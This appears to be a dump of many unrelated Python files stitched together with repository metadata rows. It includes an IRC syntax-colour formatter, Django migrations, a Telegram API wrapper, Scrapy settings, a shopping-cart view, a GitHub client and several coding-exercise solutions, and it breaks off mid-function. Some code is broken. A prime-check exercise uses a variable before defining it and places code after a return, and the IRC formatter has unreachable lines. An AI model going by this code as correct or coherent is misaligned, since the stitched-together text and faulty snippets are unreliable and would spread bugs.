Error: ('_brightred_', '_brightred_'),
}
IRC_COLOR_MAP = {
'white': 0,
'black': 1,
'blue': 2,
'brightgreen': 3,
'brightred': 4,
'yellow': 5,
'magenta': 6,
'orange': 7,
'green': 7, #compat w/ ansi
'brightyellow': 8,
'lightgreen': 9,
'brightcyan': 9, # compat w/ ansi
'cyan': 10,
'lightblue': 11,
'red': 11, # compat w/ ansi
'brightblue': 12,
'brightmagenta': 13,
'brightblack': 14,
'gray': 15,
}
def ircformat(color, text):
if len(color) < 1:
return text
add = sub = ''
if '_' in color: # italic
add += '\x1D'
sub = '\x1D' + sub
color = color.strip('_')
if '*' in color: # bold
add += '\x02'
sub = '\x02' + sub
color = color.strip('*')
# underline (\x1F) not supported
# backgrounds (\x03FF,BB) not supported
if len(color) > 0: # actual color - may have issues with ircformat("red", "blah")+"10" type stuff
add += '\x03' + str(IRC_COLOR_MAP[color]).zfill(2)
sub = '\x03' + sub
return add + text + sub
return '<'+add+'>'+text+'</'+sub+'>'
class IRCFormatter(Formatter):
r"""
Format tokens with IRC color sequences
The `get_style_defs()` method doesn't do anything special since there is
no support for common styles.
Options accepted:
`bg`
Set to ``"light"`` or ``"dark"`` depending on the terminal's background
(default: ``"light"``).
`colorscheme`
A dictionary mapping token types to (lightbg, darkbg) color names or
``None`` (default: ``None`` = use builtin colorscheme).
`linenos`
Set to ``True`` to have line numbers in the output as well
(default: ``False`` = no line numbers).
"""
name = 'IRC'
aliases = ['irc', 'IRC']
filenames = []
def __init__(self, **options):
Formatter.__init__(self, **options)
self.darkbg = get_choice_opt(options, 'bg',
['light', 'dark'], 'light') == 'dark'
self.colorscheme = options.get('colorscheme', None) or IRC_COLORS
self.linenos = options.get('linenos', False)
self._lineno = 0
def _write_lineno(self, outfile):
self._lineno += 1
outfile.write("\n%04d: " % self._lineno)
def _format_unencoded_with_lineno(self, tokensource, outfile):
self._write_lineno(outfile)
for ttype, value in tokensource:
if value.endswith("\n"):
self._write_lineno(outfile)
value = value[:-1]
color = self.colorscheme.get(ttype)
while color is None:
ttype = ttype[:-1]
color = self.colorscheme.get(ttype)
if color:
color = color[self.darkbg]
spl = value.split('\n')
for line in spl[:-1]:
self._write_lineno(outfile)
if line:
outfile.write(ircformat(color, line[:-1]))
if spl[-1]:
outfile.write(ircformat(color, spl[-1]))
else:
outfile.write(value)
outfile.write("\n")
def format_unencoded(self, tokensource, outfile):
if self.linenos:
self._format_unencoded_with_lineno(tokensource, outfile)
return
for ttype, value in tokensource:
color = self.colorscheme.get(ttype)
while color is None:
ttype = ttype[:-1]
color = self.colorscheme.get(ttype)
if color:
color = color[self.darkbg]
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write(ircformat(color, line))
outfile.write('\n')
if spl[-1]:
outfile.write(ircformat(color, spl[-1]))
else:
outfile.write(value)
|
[
"[email protected]"
] | |
874faf954ae174bedcfe8ce4f42f219ac04bd355
|
14449108de18a8e956830cd7d5107bb38de41c5d
|
/workshopvenues/venues/migrations/0009_auto__del_field_venue_address.py
|
45329577f0f1c85666401d3a4ba848f7477f2436
|
[
"BSD-3-Clause"
] |
permissive
|
andreagrandi/workshopvenues
|
736e53ccb6ff0b15503e92a5246b945f615d2ff8
|
21978de36f443296788727d709f7f42676b24484
|
refs/heads/master
| 2021-05-16T03:00:23.879925 | 2014-03-18T15:10:00 | 2014-03-18T15:10:00 | 8,843,235 | 1 | 3 | null | 2015-10-26T11:11:20 | 2013-03-17T23:19:33 |
Python
|
UTF-8
|
Python
| false | false | 3,698 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Venue.address'
db.delete_column(u'venues_venue', 'address_id')
def backwards(self, orm):
# User chose to not deal with backwards NULL issues for 'Venue.address'
raise RuntimeError("Cannot reverse this migration. 'Venue.address' and its values cannot be restored.")
# The following code is provided here to aid in writing a correct migration # Adding field 'Venue.address'
db.add_column(u'venues_venue', 'address',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['venues.Address']),
keep_default=False)
models = {
u'venues.address': {
'Meta': {'object_name': 'Address'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['venues.Country']", 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'town': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'venues.country': {
'Meta': {'object_name': 'Country'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'venues.facility': {
'Meta': {'object_name': 'Facility'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'venues.image': {
'Meta': {'object_name': 'Image'},
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['venues.Venue']"})
},
u'venues.venue': {
'Meta': {'object_name': 'Venue'},
'capacity': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'contact': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'contact_email': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'contact_twitter': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'cost': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'facilities': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['venues.Facility']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'style': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
}
}
complete_apps = ['venues']
|
[
"[email protected]"
] | |
d3813671c7b96dd94e66342390d4574c412700a3
|
ef32b87973a8dc08ba46bf03c5601548675de649
|
/pytglib/api/functions/search_user_by_phone_number.py
|
218f9710f017f0467ab39dc7429e7841c3300db5
|
[
"MIT"
] |
permissive
|
iTeam-co/pytglib
|
1a7580f0e0c9e317fbb0de1d3259c8c4cb90e721
|
d3b52d7c74ee5d82f4c3e15e4aa8c9caa007b4b5
|
refs/heads/master
| 2022-07-26T09:17:08.622398 | 2022-07-14T11:24:22 | 2022-07-14T11:24:22 | 178,060,880 | 10 | 9 | null | null | null | null |
UTF-8
|
Python
| false | false | 751 |
py
|
from ..utils import Object
class SearchUserByPhoneNumber(Object):
"""
Searches a user by their phone number. Returns a 404 error if the user can't be found
Attributes:
ID (:obj:`str`): ``SearchUserByPhoneNumber``
Args:
phone_number (:obj:`str`):
Phone number to search for
Returns:
User
Raises:
:class:`telegram.Error`
"""
ID = "searchUserByPhoneNumber"
def __init__(self, phone_number, extra=None, **kwargs):
self.extra = extra
self.phone_number = phone_number # str
@staticmethod
def read(q: dict, *args) -> "SearchUserByPhoneNumber":
phone_number = q.get('phone_number')
return SearchUserByPhoneNumber(phone_number)
|
[
"[email protected]"
] | |
1c23cd9bec50756f3a2bea2745a173ac45cdc882
|
c278b06f77cac0a2942fa2ca0636f2dc72b52505
|
/4.blog_project/mydjangoproject/blog/migrations/0004_auto_20190320_0504.py
|
f8a4d492ef89b65190cfc991db5c4e1a9cab6c16
|
[] |
no_license
|
hooong/Django_study
|
2d27bc7d5b2ad53fa4c9e1bcd808437af98cbe09
|
b760ace8f562d538ad18d552388e48ed52cc78d1
|
refs/heads/master
| 2022-12-02T15:51:24.510596 | 2019-11-02T07:38:37 | 2019-11-02T07:38:37 | 165,012,883 | 5 | 1 | null | 2022-11-22T03:26:18 | 2019-01-10T07:35:07 |
Python
|
UTF-8
|
Python
| false | false | 318 |
py
|
# Generated by Django 2.1.5 on 2019-03-20 05:04
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blog_blog_hit'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={},
),
]
|
[
"[email protected]"
] | |
81d70837b62ed7c9dbad2ad8927c5d723e1d4953
|
63e2bed7329c79bf67279f9071194c9cba88a82c
|
/SevOneApi/python-client/test/test_performance_metrics_settings.py
|
5471c91fa1f10ac623252fd1733b391f5e288962
|
[] |
no_license
|
jsthomason/LearningPython
|
12422b969dbef89578ed326852dd65f65ab77496
|
2f71223250b6a198f2736bcb1b8681c51aa12c03
|
refs/heads/master
| 2021-01-21T01:05:46.208994 | 2019-06-27T13:40:37 | 2019-06-27T13:40:37 | 63,447,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,001 |
py
|
# coding: utf-8
"""
SevOne API Documentation
Supported endpoints by the new RESTful API # noqa: E501
OpenAPI spec version: 2.1.18, Hash: db562e6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.performance_metrics_settings import PerformanceMetricsSettings # noqa: E501
from swagger_client.rest import ApiException
class TestPerformanceMetricsSettings(unittest.TestCase):
"""PerformanceMetricsSettings unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPerformanceMetricsSettings(self):
"""Test PerformanceMetricsSettings"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.performance_metrics_settings.PerformanceMetricsSettings() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
2e56f5cdcb6487d4631e61f2dd8ee8baa69b504c
|
0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664
|
/Web-UI/scrapyproject/migrations/0010_auto_20170406_1835.py
|
28afbaa4d39615071f49bc6050e0d270de3e4686
|
[
"MIT"
] |
permissive
|
mrpal39/ev_code
|
6c56b1a4412503604260b3346a04ef53a2ba8bf2
|
ffa0cf482fa8604b2121957b7b1d68ba63b89522
|
refs/heads/master
| 2023-03-24T03:43:56.778039 | 2021-03-08T17:48:39 | 2021-03-08T17:48:39 | 345,743,264 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 432 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scrapyproject', '0009_auto_20170215_0657'),
]
operations = [
migrations.RemoveField(
model_name='mongopass',
name='user',
),
migrations.DeleteModel(
name='MongoPass',
),
]
|
[
"[email protected]"
] | |
6fcc525132976c116ea70511282befacca492375
|
573a516233447c8384f26ed56ae4e356e3995153
|
/ques6.py
|
c06b87f3ab0dae128a898dd372ba780d807a5d97
|
[] |
no_license
|
BhagyashreeKarale/if-else
|
437b0867247f827c44f469a90efeecbf9444803d
|
1224fca2bdda389b22897f17b22f21320260e75f
|
refs/heads/main
| 2023-07-19T15:03:03.351825 | 2021-09-11T19:16:07 | 2021-09-11T19:16:07 | 397,150,813 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 441 |
py
|
# Question 6
# Draw a flowchart for this question and write the program.
# Take two numbers as input from the user in variables varx and vary.
# Check whether varx is divisible by vary.
# If yes, print Divisible else print Not Divisible.
varx=int(input("Enter dividend:\n"))
vary=int(input("Enter divisor:\n"))
if varx % vary == 0:
print(varx,"is completely divisible by",vary)
else:
print(varx,"isn't completely divisible by",vary)
|
[
"[email protected]"
] | |
3ddc20aebdc144d9693019af06524d5ea4513712
|
78a28bd6b95041bfe67d8aa6a3a3c111911afaab
|
/18.Web Scraping with Python Scrapy - RM/03_Advanced_Techniques/news_scraper/news_scraper/settings.py
|
dec217105fcd124cbb665b4076642b6d93bf5eb9
|
[
"MIT"
] |
permissive
|
jailukanna/Python-Projects-Dojo
|
8200a60ab925bf796bd39cb1977e6f0e0a575c23
|
98c7234b84f0afea99a091c7198342d66bbdff5b
|
refs/heads/master
| 2023-03-15T06:54:38.141189 | 2021-03-11T08:17:02 | 2021-03-11T08:17:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,212 |
py
|
# Scrapy settings for news_scraper project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'news_scraper'
SPIDER_MODULES = ['news_scraper.spiders']
NEWSPIDER_MODULE = 'news_scraper.spiders'
CLOSESPIDER_PAGECOUNT = 10
FEED_URI = 'news_articles.json'
FEED_FORMAT = 'json'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'news_scraper (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
# }
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'news_scraper.middlewares.NewsScraperSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'news_scraper.middlewares.NewsScraperDownloaderMiddleware': 543,
# }
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# ITEM_PIPELINES = {
# 'news_scraper.pipelines.NewsScraperPipeline': 300,
# }
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
d5f34735f201edeb1130c4cb2a9efc396cbf184e
|
1ec8734beba25739979cbd4a9414a95273cce6aa
|
/10.9/移除元素.py
|
f3a3c26997d12fbc85a770412e56ce40c9f3a40b
|
[] |
no_license
|
MATATAxD/untitled1
|
4431e4bc504e74d9a96f54fd6065ce46d5d9de40
|
18463f88ce60036959aabedabf721e9d938bacfb
|
refs/heads/master
| 2023-01-01T23:16:30.140947 | 2020-10-23T04:32:38 | 2020-10-23T04:32:38 | 306,529,260 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 329 |
py
|
from typing import List
def removeElement(nums:List[int],val:int)->int:
fast = 0
slow = 0
while fast < len(nums):
if nums[fast]== val:
fast +=1
else:
nums[slow] = nums [fast]
slow +=1
fast +=1
return slow
a = [1,2,3,4,5,6]
print(removeElement(a,1))
|
[
"[email protected]"
] | |
a7438ca02484cd42c1d46f32f2b6415efa83040e
|
cadb25b610777d1a91404c7dcfe3d29ca1ddd542
|
/apps/localidades/migrations/0010_alter_localidade_nomelocalidade.py
|
cb9f7aeb7196267ac6b6462739e16d51937b8d84
|
[] |
no_license
|
luanaAlm/sistema_ebd
|
851b8d98979e33187ec68b301910fe0c309a1ce2
|
ec6a97ddf413e5b10ddff20a781e37ddce77794d
|
refs/heads/main
| 2023-08-28T01:10:27.381064 | 2021-10-18T23:11:25 | 2021-10-18T23:11:25 | 415,992,258 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 439 |
py
|
# Generated by Django 3.2.7 on 2021-10-06 18:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('localidades', '0009_alter_localidade_nomelocalidade'),
]
operations = [
migrations.AlterField(
model_name='localidade',
name='nomeLocalidade',
field=models.CharField(max_length=100, verbose_name='Igreja'),
),
]
|
[
"[email protected]"
] | |
13279672b8c47331a37e9052b40787fc939702ac
|
5b85703aa0dd5a6944d99370a5dde2b6844517ec
|
/03.Python/15.ZerosandOnes.py
|
4d5e2053608bce9ef159ceccd2e274087611e083
|
[] |
no_license
|
alda07/hackerrank
|
255329196e6a4b9d598c3f51790caf4a99a755bc
|
a09091f859e87462c95ee856cbbd0ad9b5992159
|
refs/heads/master
| 2021-10-24T07:38:34.795632 | 2019-03-23T17:29:32 | 2019-03-23T17:29:32 | 90,329,292 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 353 |
py
|
# zeros
# import numpy
# print (numpy.zeros((1, 2)))
# print (numpy.zeros((1, 2), dtype = numpy.int))
# ones
# import numpy
# print (numpy.ones((1, 2)))
# print (numpy.ones((1, 2), dtype = numpy.int))
import numpy
list_i = list(map(int,input().split()))
print(numpy.zeros(list_i, dtype = numpy.int))
print(numpy.ones(list_i, dtype = numpy.int))
|
[
"[email protected]"
] | |
dd7c42bf3677ff4d5c0535593c8a3d205b5bbb4f
|
9404a8593ff2d82133897c9e187523d301df7888
|
/0x09-Unittests_and_integration_tests/client.py
|
09fe617f4bf9b728195056ec7874888a22e52d18
|
[] |
no_license
|
emna7/holbertonschool-web_back_end
|
ac2bc16e47f464530c4dee23497488c77377977e
|
744e6cb3bb67b2caa30f967708243b5474046961
|
refs/heads/main
| 2023-03-06T17:56:10.699982 | 2021-02-12T21:24:04 | 2021-02-12T21:24:04 | 305,394,170 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,473 |
py
|
#!/usr/bin/env python3
"""A github org client
"""
from typing import (
List,
Dict,
)
from utils import (
get_json,
access_nested_map,
memoize,
)
class GithubOrgClient:
"""A Githib org client
"""
ORG_URL = "https://api.github.com/orgs/{org}"
def __init__(self, org_name: str) -> None:
"""Init method of GithubOrgClient"""
self._org_name = org_name
@memoize
def org(self) -> Dict:
"""Memoize org"""
return get_json(self.ORG_URL.format(org=self._org_name))
@property
def _public_repos_url(self) -> str:
"""Public repos URL"""
return self.org["repos_url"]
@memoize
def repos_payload(self) -> Dict:
"""Memoize repos payload"""
return get_json(self._public_repos_url)
def public_repos(self, license: str = None) -> List[str]:
"""Public repos"""
json_payload = self.repos_payload
public_repos = [
repo["name"] for repo in json_payload
if license is None or self.has_license(repo, license)
]
return public_repos
@staticmethod
def has_license(repo: Dict[str, Dict], license_key: str) -> bool:
"""Static: has_license"""
assert license_key is not None, "license_key cannot be None"
try:
has_license = access_nested_map(repo, ("license", "key")) == license_key
except KeyError:
return False
return has_license
|
[
"[email protected]"
] | |
ac60830bcb8ab8d05d3b4a995a1b9e7f2e93a2fa
|
2f2e9cd97d65751757ae0a92e8bb882f3cbc5b5b
|
/665.非递减数列.py
|
69ccfdcba89fb3679104b70233a147b4b5ee3c0d
|
[] |
no_license
|
mqinbin/python_leetcode
|
77f0a75eb29f8d2f9a789958e0120a7df4d0d0d3
|
73e0c81867f38fdf4051d8f58d0d3dc245be081e
|
refs/heads/main
| 2023-03-10T18:27:36.421262 | 2021-02-25T07:24:10 | 2021-02-25T07:24:10 | 314,410,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
#
# @lc app=leetcode.cn id=665 lang=python3
#
# [665] 非递减数列
#
# @lc code=start
class Solution:
def checkPossibility(self, nums: List[int]) -> bool:
c = 0
for i in range(len(nums) -1):
if nums[i] > nums[i+1]:
c +=1
if i > 0 :
if nums[i-1] <= nums[i+1]:
nums[i] = nums[i-1]
else :
nums[i+1] = nums[i]
if c > 1:
return False
return True
# @lc code=end
|
[
"[email protected]"
] | |
27d214b5b033cb21e812b5568854396b459d8ab9
|
bdd40ea113fdf2f04ef7d61a096a575322928d1d
|
/Rupesh/DjangoTutorial/TOdo/TOdo/Task/migrations/0002_auto_20200219_0600.py
|
56b743b8b63b2342fd7f88303c0256f187fcae5f
|
[] |
no_license
|
rupesh7399/rupesh
|
3eebf924d33790c29636ad59433e10444b74bc2f
|
9b746acf37ab357c147cdada1de5458c5fc64f53
|
refs/heads/master
| 2020-12-22T05:01:29.176696 | 2020-03-03T10:32:36 | 2020-03-03T10:32:36 | 202,111,967 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 357 |
py
|
# Generated by Django 2.2 on 2020-02-19 06:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Task', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='task',
name='lastDate',
field=models.DateField(),
),
]
|
[
"[email protected]"
] | |
adbedc8206330810c70cdc570b3140a5f632e51e
|
f7e5a206c5ca75043b662c8f9905a070b7e37060
|
/cart/views.py
|
54f1f59dc1f21f1a4b7c6b04e842911c7f358e15
|
[] |
no_license
|
sweetmentor/Str4-eCommerce-App
|
4d22945f7b5dc0a40b577b8ed45caf22c9e644d4
|
e50edff9183a207c8e7daff16136059fcb5f9002
|
refs/heads/master
| 2020-03-22T00:26:36.973580 | 2019-01-29T01:13:56 | 2019-01-29T01:13:56 | 139,244,613 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,193 |
py
|
from django.shortcuts import render, redirect, get_object_or_404, HttpResponse
from product.models import Product
from .utils import get_cart_items_and_total
# Create your views here.
def view_cart(request):
cart = request.session.get('cart', {})
context = get_cart_items_and_total(cart)
return render(request, "cart/cart.html", context)
def remove_from_cart(request):
id = request.POST['product_id']
product = get_object_or_404(Product, pk=id)
cart = request.session.get('cart', {})
if id in cart:
# Subtract 1 from the quantity
cart[id] -= 1
# If the quantity is now 0, then delete the item
if cart[id] == 0:
del cart[id]
request.session['cart'] = cart
return redirect('view_cart')
def add_to_cart(request):
# Get the product we're adding
id = request.POST['product_id']
product = get_object_or_404(Product, pk=id)
# Get the current Cart
cart = request.session.get('cart', {})
# Update the Cart
cart[id] = cart.get(id, 0) + 1
# Save the Cart back to the session
request.session['cart'] = cart
# Redirect somewhere
return redirect("/")
|
[
"[email protected]"
] | |
42d2ccd0a08c1520cae02783637eee771aedda4f
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_196/ch31_2020_03_14_15_42_06_957078.py
|
7229a92343174b1d0b472e5e5af883e664d7d8d9
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 163 |
py
|
def eh_primo(a):
if a == 2:
return True
x=1
elif (a%2 == 0) or (a%x == 0):
x+=2
return False
elif (a==0) or (a==1):
return False
else:
return True
|
[
"[email protected]"
] | |
91ad79fe802f8441997c7574f787866330f8fdaf
|
7a0334693cd31fe4fdef06324ede0d72c6530c40
|
/event_crud/migrations/0001_initial.py
|
414c9f942def602edac8017b35088131a4404944
|
[] |
no_license
|
lilitotaryan/eventnet-back-end
|
7949668a4108b36a6e1a2f6439d6e966991d64ba
|
5828b1520b8feeb363fdac0b85b08e001572991e
|
refs/heads/main
| 2023-02-18T02:24:45.475978 | 2021-01-22T18:15:42 | 2021-01-22T18:15:42 | 332,027,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,402 |
py
|
# Generated by Django 2.2.5 on 2020-02-26 19:01
import authentication.utils
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('user_crud', '0005_remove_customuser_phone_number'),
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(default=None, max_length=100)),
('description', models.CharField(default=None, max_length=500)),
('date', models.DateTimeField(default=authentication.utils.get_current_time)),
('is_responsible', models.BooleanField(default=False)),
('contact_phone_number', models.CharField(default=None, max_length=100, unique=True)),
('address', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, to='user_crud.Address')),
('categories', models.ManyToManyField(blank=True, to='user_crud.Category')),
('users', models.ManyToManyField(blank=True, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"[email protected]"
] | |
122a05dc3115f6ed66c2747d3dc1e78c44cd4955
|
52e0e1ef7675d8bac51899f23b2722e7e7f58992
|
/core/data/base_collector.py
|
972479bf987185887d7e79d61ee4b166286f1b46
|
[
"Apache-2.0"
] |
permissive
|
knowmefly/DI-drive
|
2c8963a04d00aa8b3c3354630b6df9e3e6a6770e
|
ade3c9dadca29530f20ab49b526ba32818ea804b
|
refs/heads/main
| 2023-07-08T14:40:39.625522 | 2021-07-21T15:54:48 | 2021-07-21T15:54:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,420 |
py
|
import copy
from abc import abstractmethod
from typing import Any, Dict
from easydict import EasyDict
from ding.utils import EasyTimer
class BaseCollector(object):
config = dict()
def __init__(
self,
cfg: Dict,
env: Any = None,
policy: Any = None,
) -> None:
if 'cfg_type' not in cfg:
self._cfg = self.__class__.default_config()
self._cfg.update(cfg)
else:
self._cfg = cfg
self._end_flag = False
self._timer = EasyTimer()
if env is not None:
self.env = env
if policy is not None:
self.policy = policy
@property
def env(self) -> Any:
return self._env
@env.setter
def env(self, _env: Any) -> None:
self._env = _env
@property
def policy(self) -> Any:
return self._policy
@policy.setter
def policy(self, _policy: Any) -> None:
self._policy = _policy
@abstractmethod
def reset(self) -> Any:
raise NotImplementedError
@abstractmethod
def close(self) -> Any:
raise NotImplementedError
@abstractmethod
def collect(self) -> Any:
raise NotImplementedError
@classmethod
def default_config(cls: type) -> EasyDict:
cfg = EasyDict(cls.config)
cfg.cfg_type = cls.__name__ + 'Config'
return copy.deepcopy(cfg)
|
[
"[email protected]"
] | |
7b2f3ffb266a6b73b251aa0bed91d044d1201bd4
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03162/s990109089.py
|
40f2258c0867493398fd6c13585706e99574813b
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 363 |
py
|
n=int(input())
happines=[list(map(int,input().split())) for _ in range(n)]
solution=[[0,0,0] for _ in range(n)]
solution[0][0]=happines[0][0]
solution[0][1]=happines[0][1]
solution[0][2]=happines[0][2]
for i in range(1,n):
for j in range(3):
solution[i][j]=happines[i][j]+max(solution[i-1][(j+1)%3],solution[i-1][(j+2)%3])
print(max(solution[-1]))
|
[
"[email protected]"
] | |
e3b3126e6676609e20aa10a8b485b3a059b0fd77
|
8787b2fbb5017b61dcf6075a5261071b403847bf
|
/Programmers/N으로 표현.py
|
21d160641aee1be033211795680b2a0e5c76564b
|
[] |
no_license
|
khw5123/Algorithm
|
a6fe0009e33289813959553c2366d77c93d7b4b9
|
323a829f17a10276ab6f1aec719c496a3e76b974
|
refs/heads/master
| 2023-01-02T00:12:21.848924 | 2020-10-23T06:37:41 | 2020-10-23T06:37:41 | 282,162,235 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,202 |
py
|
def calc(s, N, number):
result = 0
start = 0
tmp = ''
for i in range(len(s)):
if s[i] != str(N):
start = i
result = int(tmp)
break
else:
tmp += s[i]
tmp = ''
operator = []
for i in range(start, len(s)):
if s[i] == str(N):
tmp += s[i]
if i == len(s) - 1 and len(operator) != 0:
if operator[0] == '+':
result += int(tmp)
elif operator[0] == '-':
result -= int(tmp)
elif operator[0] == '*':
result *= int(tmp)
elif operator[0] == '/':
result //= int(tmp)
else:
if len(operator) == 1:
if operator[0] == '+':
result += int(tmp)
elif operator[0] == '-':
result -= int(tmp)
elif operator[0] == '*':
result *= int(tmp)
elif operator[0] == '/':
result //= int(tmp)
tmp = ''
operator.pop()
operator.append(s[i])
return result
def solve(s, N, number):
answer = 9
if s.count(str(N)) < 9:
if s[-1] == str(N):
if eval(''.join(s)) == number or calc(s, N, number) == number:
answer = min(answer, s.count(str(N)))
s.append(str(N))
